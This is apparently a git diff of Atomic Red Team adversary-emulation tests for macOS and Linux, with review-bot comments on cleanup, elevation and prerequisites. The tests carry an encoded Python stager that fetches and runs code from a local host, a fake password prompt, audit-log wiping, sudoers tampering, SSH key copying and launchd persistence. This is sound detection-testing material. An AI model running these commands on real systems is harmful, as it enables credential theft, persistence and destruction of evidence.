diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml
index 91329390..2b9e8f1d 100644
--- a/atomics/T1027.001/T1027.001.yaml
+++ b/atomics/T1027.001/T1027.001.yaml
@@ -22,7 +22,7 @@ atomic_tests:
prereq_command: |
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- cp /bin/ls /tmp/evil-binary
+ cp /bin/ls #{file_to_pad}
executor:
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index dd60024c..8b664b82 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -11,6 +11,7 @@ atomic_tests:
- macos
executor:
command: |
- echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
- name: sh
+ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
+ elevation_required: true
+ name: bash
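Review bot: The new command line `sudo echo … >> /etc/rc.common` elevates only `echo`; the `>>` redirection is still opened by the unprivileged shell, so on a protected /etc/rc.common the append fails with a permission error and the test does nothing. Since `elevation_required: true` is now set, the runner already supplies elevation and the `sudo` prefix can simply be dropped, or the whole line kept under one privileged shell as T1574.006 does, `sudo sh -c 'echo … >> /etc/rc.common'`. The executor also has no `cleanup_command`, so the appended line persists and accumulates on every run; a cleanup that removes it would return the host to its pre-test state. The enclosing atomic starts before this hunk.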
diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml
index 38144e7a..e89014e9 100644
--- a/atomics/T1040/T1040.yaml
+++ b/atomics/T1040/T1040.yaml
@@ -33,10 +33,18 @@ atomic_tests:
description: Specify interface to perform PCAP on.
type: String
default: en0A
+ dependency_executor_name: /bin/zsh
+ dependencies:
+ - description: |
+ Check if at least one of the tools are installed on the machine.
+ prereq_command: |
+ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
+ get_prereq_command: |
+ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
executor:
command: |
- tcpdump -c 5 -nnni #{interface}
- tshark -c 5 -i #{interface}
+ sudo tcpdump -c 5 -nnni #{interface}
+ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
name: bash
elevation_required: true
- name: Packet Capture Windows Command Prompt
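Review bot: `dependency_executor_name: /bin/zsh` is a path rather than an executor name; the other dependency blocks added in this commit (T1543.001, T1543.004) use `bash`, and a runner that dispatches on the executor name is unlikely to recognise a path, so `dependency_executor_name: bash` is the safe spelling and matches the executor's `name: bash` below. The prerequisite accepts either tcpdump or tshark, but the executor runs `sudo tcpdump` unconditionally and guards only tshark, so a host with only tshark satisfies the prerequisite and then errors on the first line; guard tcpdump the same way: `if [ -x "$(command -v tcpdump)" ]; then sudo tcpdump -c 5 -nnni #{interface}; fi;`. With `elevation_required: true` already present the `sudo` prefixes are redundant under a runner that provides elevation.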
diff --git a/atomics/T1053.004/T1053.004.yaml b/atomics/T1053.004/T1053.004.yaml
index bf973427..5e16a975 100644
--- a/atomics/T1053.004/T1053.004.yaml
+++ b/atomics/T1053.004/T1053.004.yaml
@@ -10,45 +10,25 @@ atomic_tests:
supported_platforms:
- macos
- - linux
-
+ input_arguments:
+ script_location:
+ description: evil plist location
+ type: path
+ default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist
+ script_destination:
+ description: Path where to move the evil plist
+ type: path
+ default: /etc/emond.d/rules/atomicredteam_T1053_004.plist
+ empty_file:
+ description: Random name of the empty file used to trigger emond service
+ type: string
+ default: randomflag
executor:
- name: manual
- steps: |
- 1. Place this file in /etc/emond.d/rules/atomicredteam.plist
-
-
-
-
-
- name
- atomicredteam
- enabled
-
- eventTypes
-
- startup
-
- actions
-
-
- command
- /usr/bin/say
- user
- root
- arguments
-
- -v Tessa
- I am a persistent startup item.
-
- type
- RunCommand
-
-
-
-
-
-
- 2. Place an empty file in /private/var/db/emondClients/
-
- 3. sudo touch /private/var/db/emondClients/randomflag
\ No newline at end of file
+ name: bash
+ elevation_required: true
+ command: |
+ sudo cp #{script_location} #{script_destination}
+ sudo touch /private/var/db/emondClients/#{empty_file}
+ cleanup_command: |
+ sudo rm #{script_destination}
+ sudo rm /private/var/db/emondClients/#{empty_file}
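Review bot: The rewritten executor has no dependency block verifying that `#{script_location}` exists, unlike the T1543.001 and T1543.004 atomics in this same commit, so a missing plist only surfaces as a `cp` error mid-test; a `prereq_command` of the form `if [ -f #{script_location} ]; then exit 0; else exit 1; fi;` would match those tests. The cleanup removes the rule and the trigger file but not the marker the renamed plist creates as root (`/tmp/T1053_004_atomicredteam`, see the atomicredteam_T1053_004.plist hunk), so one more line, `sudo rm -f /tmp/T1053_004_atomicredteam`, is needed to restore the host. The `empty_file` description says `Random name` while the default is the fixed string `randomflag`; `Name of the empty file used to trigger emond` is the accurate wording.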
diff --git a/atomics/T1053.004/src/atomicredteam.plist b/atomics/T1053.004/src/atomicredteam_T1053_004.plist
similarity index 56%
rename from atomics/T1053.004/src/atomicredteam.plist
rename to atomics/T1053.004/src/atomicredteam_T1053_004.plist
index 62bdcff4..082280e2 100644
--- a/atomics/T1053.004/src/atomicredteam.plist
+++ b/atomics/T1053.004/src/atomicredteam_T1053_004.plist
@@ -4,7 +4,7 @@
name
- atomicredteam
+ com.atomicredteam.t1053_004
enabled
eventTypes
@@ -15,13 +15,24 @@
command
- /usr/bin/say
+ /usr/bin/sleep
user
root
arguments
- -v Tessa
- I am a persistent startup item.
+ 10
+
+ type
+ RunCommand
+
+
+ command
+ /usr/bin/touch
+ user
+ root
+ arguments
+
+ /tmp/T1053_004_atomicredteam
type
RunCommand
diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml
index 0254866a..d65f56da 100644
--- a/atomics/T1056.002/T1056.002.yaml
+++ b/atomics/T1056.002/T1056.002.yaml
@@ -11,7 +11,7 @@ atomic_tests:
executor:
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
- name: sh
+ name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
description: |
diff --git a/atomics/T1059.002/T1059.002.yaml b/atomics/T1059.002/T1059.002.yaml
index ae0a155f..a86f1a93 100644
--- a/atomics/T1059.002/T1059.002.yaml
+++ b/atomics/T1059.002/T1059.002.yaml
@@ -13,6 +13,6 @@ atomic_tests:
- macos
executor:
command: |
- osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\\\\\\\" | python &\\\"\"
+ osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
name: sh
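Review bot: The replaced line swaps in a different base64 blob (shorter than the old one, and it appears to decode to Python 2 code using `urllib2` with a short timeout), but neither the commit nor the atomic says what the decoded script does or why it changed, and an opaque encoded payload inside the executor cannot be reviewed, diffed or linted. Keep the decoded script as a readable file under the technique's `src/` directory and reference it from the command, or at minimum document its behaviour in the atomic's `description`. There is also no dependency check that a `python` interpreter exists, and `urllib2` is Python-2-only, so a `dependencies` block with `if [ -x "$(command -v python)" ]; then exit 0; else exit 1; fi;` would make the failure mode explicit instead of a silent osascript error. The enclosing atomic starts before this hunk.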
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 1b047d6a..85f304d8 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -13,7 +13,7 @@ atomic_tests:
type: string
default: dir
script_path:
- description: Path of script to create.
+ description: Script path.
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
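Review bot: The new `description: Script path.` is less informative than the `Path of script to create.` it replaces — the old wording told the user that the test creates the file rather than expecting one to exist. Keep the more specific text, or, if the goal is consistency with the `Script path` description added to T1059.004 in this commit, give that one the same "to create" detail as well.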
diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index a5c2e508..1c67ef01 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -8,12 +8,19 @@ atomic_tests:
supported_platforms:
- macos
- linux
+ input_arguments:
+ script_path:
+ description: Script path
+ type: path
+ default: /tmp/art.sh
executor:
command: |
- sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
- sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
- chmod +x /tmp/art.sh
- sh /tmp/art.sh
+ sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
+ sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
+ chmod +x #{script_path}
+ sh #{script_path}
+ cleanup_command: |
+ rm #{script_path}
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml
index 566d5564..1a050f98 100644
--- a/atomics/T1069.001/T1069.001.yaml
+++ b/atomics/T1069.001/T1069.001.yaml
@@ -10,7 +10,7 @@ atomic_tests:
- linux
executor:
command: |
- if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
+ if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
name: sh
diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml
index 3d2fec52..f86c8fcf 100644
--- a/atomics/T1083/T1083.yaml
+++ b/atomics/T1083/T1083.yaml
@@ -78,7 +78,7 @@ atomic_tests:
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
- cat #{output_file}; fi;
+ cat #{output_file}
find . -type f -name ".*"
cleanup_command: 'rm #{output_file}'
name: sh
diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml
index 9538c8d8..55e8968a 100644
--- a/atomics/T1087.001/T1087.001.yaml
+++ b/atomics/T1087.001/T1087.001.yaml
@@ -34,7 +34,7 @@ atomic_tests:
default: /tmp/T1087.001.txt
executor:
command: |
- cat /etc/sudoers > #{output_file}
+ sudo cat /etc/sudoers > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml
index 1e1ada87..8c0f7dec 100644
--- a/atomics/T1090.001/T1090.001.yaml
+++ b/atomics/T1090.001/T1090.001.yaml
@@ -26,6 +26,35 @@ atomic_tests:
unset http_proxy
unset https_proxy
name: sh
+- name: Connection Proxy for macOS UI
+ description: |
+ Enable traffic redirection on macOS UI (not terminal).
+ The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
+
+ Note that this test may conflict with pre-existing system configuration.
+ supported_platforms:
+ - macos
+ input_arguments:
+ proxy_server:
+ description: Proxy server URL (host)
+ type: string
+ default: 127.0.0.1
+ proxy_port:
+ description: Proxy server port
+ type: string
+ default: 8080
+ interface:
+ description: Protocol to proxy (http or https)
+ type: string
+ default: Wi-Fi
+ executor:
+ name: sh
+ command: |
+ networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
+ networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
+ cleanup_command: |
+ networksetup -setwebproxystate #{interface} off
+ networksetup -setsecurewebproxystate #{interface} off
- name: portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
description: |
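Review bot: The `interface` argument's description, `Protocol to proxy (http or https)`, does not match its use: the default `Wi-Fi` and the `networksetup -setwebproxy #{interface} …` calls treat it as a network service name, so it should read `Network service to configure (e.g. Wi-Fi)`. `proxy_port` is declared `type: string` but its unquoted default `8080` is read as an integer by a generic YAML loader; write `default: "8080"`. The cleanup only switches the proxy state off and leaves the injected server and port in the service configuration, which the description itself warns may conflict with pre-existing settings, and `networksetup` write operations generally need administrator rights, so consider `elevation_required: true` plus a cleanup that restores the previous values. The new atomic also lacks the `auto_generated_guid` every sibling test carries; presumably tooling fills it in — confirm.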
diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml
index 39aeb4b6..c555483e 100644
--- a/atomics/T1136.001/T1136.001.yaml
+++ b/atomics/T1136.001/T1136.001.yaml
@@ -37,7 +37,7 @@ atomic_tests:
executor:
command: |
dscl . -create /Users/#{username}
- dscl . -create /Users/#{username} UserShell /bin/bash
+ dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml
index 998cef68..856dfeaf 100644
--- a/atomics/T1518.001/T1518.001.yaml
+++ b/atomics/T1518.001/T1518.001.yaml
@@ -46,6 +46,7 @@ atomic_tests:
command: |
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
+ ps aux | grep falcond
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
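Review bot: The added `ps aux | grep falcond` matches its own grep process, so the check reports a hit even when no such sensor is present; the Little Snitch line above already filters with `| grep -v grep`, so apply the same filter here, `ps aux | grep falcond | grep -v grep`, or use `pgrep -l falcond`. The existing `CbOsxSensorService` line has the same gap but is not part of this change.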
diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml
index dd555d4f..14771b3d 100644
--- a/atomics/T1543.001/T1543.001.yaml
+++ b/atomics/T1543.001/T1543.001.yaml
@@ -7,34 +7,32 @@ atomic_tests:
Create a plist and execute it
supported_platforms:
- macos
+ input_arguments:
+ plist_filename:
+ description: filename
+ type: string
+ default: com.atomicredteam.plist
+ path_malicious_plist:
+ description: Name of file to store in cron folder
+ type: string
+ default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ The shared library must exist on disk at specified location (#{path_to_shared_library})
+ prereq_command: |
+ if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ echo "The shared library doesn't exist. Check the path"; exit 1;
executor:
- steps: |
- 1. Create file - .client
-
- 2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
-
- 3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
-
- 4.
-
-
-
-
- KeepAlive
-
- Label
- com.client.client
- ProgramArguments
-
- /Users//.client
-
- RunAtLoad
-
- NSUIElement
- 1
-
-
-
- 5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
- name: manual
+ name: bash
+ elevation_required: true
+ command: |
+ if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
+ sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
+ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
+ cleanup: |
+ sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}
+ sudo rm ~/Library/LaunchAgents/#{plist_filename}
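Review bot: The new `cleanup:` key does not match the `cleanup_command:` key used everywhere else in the repository (see the T1083, T1087.001 and T1090.001 hunks in this commit), so the unload/rm steps are likely never executed by the runner and the loaded agent persists after the test; rename it to `cleanup_command:`. The same `cleanup:` key appears in the T1543.004 and T1547.007 hunks. The `dependencies` blocks in T1543.001 and T1543.004 look copied from T1574.006: the description references `#{path_to_shared_library}`, which is not an input argument of these tests (it should be `#{path_malicious_plist}`), and the `path_malicious_plist` description `Name of file to store in cron folder` describes neither a plist nor a LaunchAgents directory. In T1543.001 the `get_prereq_command` message `The shared library doesn't exist…` is a leftover as well; T1543.004's `The plist file doesn't exist…` is the right wording.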
diff --git a/atomics/T1543.001/src/atomicredteam_T1543_001.plist b/atomics/T1543.001/src/atomicredteam_T1543_001.plist
new file mode 100644
index 00000000..3664e1aa
--- /dev/null
+++ b/atomics/T1543.001/src/atomicredteam_T1543_001.plist
@@ -0,0 +1,17 @@
+
+
+
+
+ Label
+ com.atomicredteam.t1543_001
+ ProgramArguments
+
+ touch
+ /tmp/T1543_001_atomicredteam.txt
+
+ RunAtLoad
+
+ NSUIElement
+ 1
+
+
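Review bot: The agent's only action is `touch /tmp/T1543_001_atomicredteam.txt`, and the T1543.001 yaml's cleanup removes the plist but never this marker file, so it remains on the host after the test; add `rm -f /tmp/T1543_001_atomicredteam.txt` to that cleanup. The plist markup is stripped in this rendering, so the boolean value of `RunAtLoad` cannot be verified here — presumably true, given the test expects the touch on load; confirm against the file.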
diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml
index cabccc3f..a806db85 100644
--- a/atomics/T1543.004/T1543.004.yaml
+++ b/atomics/T1543.004/T1543.004.yaml
@@ -5,26 +5,34 @@ atomic_tests:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: |
Utilize LaunchDaemon to launch `Hello World`
- supported_platforms:
- - macos
- executor:
- steps: |
- 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
- 2.
-
-
-
-
- Label
- com.example.hello
- ProgramArguments
-
- hello
- world
-
- KeepAlive
-
-
-
- name: manual
+
+ supported_platforms:
+ - macos
+
+ input_arguments:
+ plist_filename:
+ description: filename
+ type: string
+ default: com.atomicredteam.plist
+ path_malicious_plist:
+ description: Name of file to store in cron folder
+ type: string
+ default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ The shared library must exist on disk at specified location (#{path_to_shared_library})
+ prereq_command: |
+ if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ echo "The plist file doesn't exist. Check the path and try again."; exit 1;
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
+ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
+ cleanup: |
+ sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
+ sudo rm /Library/LaunchDaemons/#{plist_filename}
diff --git a/atomics/T1543.004/src/atomicredteam_T1543_004.plist b/atomics/T1543.004/src/atomicredteam_T1543_004.plist
new file mode 100644
index 00000000..fec42ec6
--- /dev/null
+++ b/atomics/T1543.004/src/atomicredteam_T1543_004.plist
@@ -0,0 +1,15 @@
+
+
+
+
+ Label
+ com.atomicredteam.t1543_004
+ ProgramArguments
+
+ touch
+ /tmp/T1543_004_atomicredteam.txt
+
+ KeepAlive
+
+
+
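Review bot: This daemon sets `KeepAlive` (value stripped in this rendering) on a `ProgramArguments` of `touch /tmp/T1543_004_atomicredteam.txt`, which exits immediately; if the value is true, launchd keeps respawning the job at its throttle interval until it is unloaded, so the yaml's cleanup must actually run — and it currently sits under a `cleanup:` key rather than `cleanup_command:`. The marker file is also never removed by that cleanup; add `rm -f /tmp/T1543_004_atomicredteam.txt`. The same marker-file gap applies to the T1543.001 plist.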
diff --git a/atomics/T1546.014/src/T1546.014_emond.plist b/atomics/T1546.014/src/T1546.014_emond.plist
index 69b2b778..ef00a146 100644
--- a/atomics/T1546.014/src/T1546.014_emond.plist
+++ b/atomics/T1546.014/src/T1546.014_emond.plist
@@ -4,42 +4,40 @@
name
- Atomic Red Team T1165
- enabled
-
- eventTypes
-
- startup
-
- actions
-
-
- command
- /bin/sleep
- user
- root
- arguments
-
- 30
-
- type
- RunCommand
-
-
- command
- /usr/bin/say
- user
- root
- arguments
-
- -v
- Karen
- Hello from Atomic Red Team technique T1165
-
- type
- RunCommand
-
-
-
+ AtomicRedTeam_T1546_014
+ enabled
+
+ eventTypes
+
+ startup
+
+ actions
+
+
+ command
+ /usr/bin/sleep
+ user
+ root
+ arguments
+
+ 10
+
+ type
+ RunCommand
+
+
+ command
+ /usr/bin/touch
+ user
+ root
+ arguments
+
+ /tmp/T1546_014_atomicredteam
+
+ type
+ RunCommand
+
+
+
diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml
index aeee40dd..69c90673 100644
--- a/atomics/T1547.007/T1547.007.yaml
+++ b/atomics/T1547.007/T1547.007.yaml
@@ -35,5 +35,8 @@ atomic_tests:
executor:
command: |
sudo defaults write com.apple.loginwindow LoginHook #{script}
+ cleanup: |
sudo defaults delete com.apple.loginwindow LoginHook
- name: sh
\ No newline at end of file
+ elevation_required: true
+ name: sh
+
\ No newline at end of file
diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml
index 149fc83f..a6f671a8 100644
--- a/atomics/T1548.003/T1548.003.yaml
+++ b/atomics/T1548.003/T1548.003.yaml
@@ -14,11 +14,11 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
- sudo -l
- sudo su
- cat /etc/sudoers
- vim /etc/sudoers
+ sudo -l
+ sudo cat /etc/sudoers
+ sudo vim /etc/sudoers
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
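Review bot: `sudo vim /etc/sudoers` on the new last command line opens an interactive editor and blocks a non-interactive runner until the session is killed; the read-under-elevation intent is already covered by the `sudo cat /etc/sudoers` line above it, so either drop the vim line or replace it with a non-interactive command such as `sudo visudo -c -f /etc/sudoers`, which the other two atomics in this file already use. Dropping the bare `sudo su` was correct for the same reason, since it would have waited on an interactive shell.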
@@ -31,6 +31,7 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
@@ -46,6 +47,7 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
\ No newline at end of file
diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1551.002/T1551.002.yaml
index 2397e36b..e9b1fbfe 100644
--- a/atomics/T1551.002/T1551.002.yaml
+++ b/atomics/T1551.002/T1551.002.yaml
@@ -10,9 +10,10 @@ atomic_tests:
- linux
executor:
command: |
- rm -rf /private/var/log/system.log*
- rm -rf /private/var/audit/*
+ sudo rm -rf /private/var/log/system.log*
+ sudo rm -rf /private/var/audit/*
name: sh
+ elevation_required: true
- name: Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
description: |
diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index 66bb8492..5bd597e8 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -10,7 +10,8 @@ atomic_tests:
executor:
command: |
python2 laZagne.py all
- name: sh
+ elevation_required: true
+ name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: |
diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index d03bbcbe..91df1ceb 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -21,14 +21,20 @@ atomic_tests:
- macos
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_file:
description: Output file containing locations of SSH key files
type: path
default: /tmp/keyfile_locations.txt
executor:
command: |
- find / -name id_rsa >> #{output_file}
- find / -name id_dsa >> #{output_file}
+ find #{search_path} -name id_rsa >> #{output_file}
+ find #{search_path} -name id_dsa >> #{output_file}
+ cleanup_command: |
+ rm #{output_file}
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
@@ -37,6 +43,10 @@ atomic_tests:
supported_platforms:
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -44,8 +54,10 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
- find / -name id_rsa -exec cp --parents {} #{output_folder} \;
- find / -name id_dsa -exec cp --parents {} #{output_folder} \;
+ find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
+ find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \;
+ cleanup_command: |
+ rm #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
